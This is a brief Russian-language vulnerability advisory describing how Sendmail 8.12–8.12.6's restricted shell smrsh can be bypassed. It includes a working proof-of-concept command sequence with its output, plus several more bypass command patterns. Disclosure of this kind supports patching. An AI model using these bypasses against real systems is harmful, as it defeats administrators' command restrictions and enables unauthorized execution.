Sendmail - популярный почтовый агент для UNIX систем.
Программа smrsh (Sendmail Consortium-s Restricted SShell) разработана для предотвращения выполнения команд вне ограниченной среды. Однако, когда задаются команды
с использованием символов (||),(.) или (/), пользователи могут обойти проверки, выполняемые smrsh. Уязвимость позволяет пользователям выполнять команды не ограниченной среды.
Пример:
$ echo "echo unauthorized execute" > /tmp/unauth
$ smrsh -c ". || . /tmp/unauth || ."
/bin/sh: /etc/smrsh/.: is a directory
unauthorized execute
Или одну из следующих типов команд:
smrsh -c "/ command"
smrsh -c "../ command"
smrsh -c "./ command"
smrsh -c "././ command"
Уязвимость обнаружена в Sendmail Consortium Sendmail 8.12-8.12.6.
